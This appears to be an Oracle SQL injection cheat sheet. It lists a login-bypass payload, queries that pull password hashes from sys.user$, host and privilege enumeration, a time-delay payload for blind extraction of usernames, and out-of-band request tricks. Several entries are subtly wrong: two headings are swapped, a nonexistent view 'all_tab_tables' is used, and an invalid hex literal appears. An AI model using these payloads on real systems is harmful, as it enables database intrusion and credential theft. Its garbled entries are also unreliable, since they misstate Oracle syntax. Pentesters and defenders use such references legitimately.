Oracle
Default Databases
| SYSTEM |
Available in all versions |
| SYSAUX |
Available in all versions |
The following can be used to comment out the rest of the query after your injection:
Example:
- SELECT * FROM Users WHERE username = '' OR 1=1 --' AND password = '';
Testing Version
| SELECT banner FROM v$version WHERE banner LIKE 'Oracle%'; |
| SELECT banner FROM v$version WHERE banner LIKE 'TNS%'; |
| SELECT version FROM v$instance; |
Notes:
- All SELECT statements in Oracle must contain a table.
dual is a dummy table which can be used for testing.
Database Credentials
| SELECT username FROM all_users; |
Available on all versions |
| SELECT name, password from sys.user$; |
Privileged, <= 10g |
| SELECT name, spare4 from sys.user$; |
Privileged, <= 11g |
Database Names
Current Database
| SELECT name FROM v$database; |
| SELECT instance_name FROM v$instance |
| SELECT global_name FROM global_name |
| SELECT SYS.DATABASE_NAME FROM DUAL |
User Databases
| SELECT DISTINCT owner FROM all_tables; |
Server Hostname
| SELECT host_name FROM v$instance; (Privileged) |
| SELECT UTL_INADDR.get_host_name FROM dual; |
| SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual; |
| SELECT UTL_INADDR.get_host_address FROM dual; |
Tables and Columns
Retrieving Tables
| SELECT table_name FROM all_tables; |
Retrieving Columns
| SELECT column_name FROM all_tab_columns; |
Find Tables from Column Name
| SELECT column_name FROM all_tab_columns WHERE table_name = 'Users'; |
Find Columns From Table Name
| SELECT table_name FROM all_tab_tables WHERE column_name = 'password'; |
Retrieving Multiple Tables at once
| SELECT RTRIM(XMLAGG(XMLELEMENT(e, table_name || ',')).EXTRACT('//text()').EXTRACT('//text()') ,',') FROM all_tables; |
Avoiding the use of quotations
Unlike other RDBMS, Oracle allows table/column names to be encoded.
| SELECT 0x09120911091 FROM dual; |
Hex Encoding. |
| SELECT CHR(32)||CHR(92)||CHR(93) FROM dual; |
CHR() Function. |
String Concatenation
| SELECT 'a'||'d'||'mi'||'n' FROM dual; |
Conditional Statements
| SELECT CASE WHEN 1=1 THEN 'true' ELSE 'false' END FROM dual |
Timing
Time Delay
| SELECT UTL_INADDR.get_host_address('non-existant-domain.com') FROM dual; |
Heavy Time Delays
| AND (SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) > 0 AND 300 > ASCII(SUBSTR((SELECT username FROM all_users WHERE rownum = 1),1,1)); |
Privileges
| SELECT privilege FROM session_privs; |
| SELECT grantee, granted_role FROM dba_role_privs; (Privileged) |
Out Of Band Channeling
DNS Requests
| SELECT UTL_HTTP.REQUEST('http://localhost') FROM dual; |
| SELECT UTL_INADDR.get_host_address('localhost.com') FROM dual; |
Password Cracking
A Metasploit module for JTR can be found here.
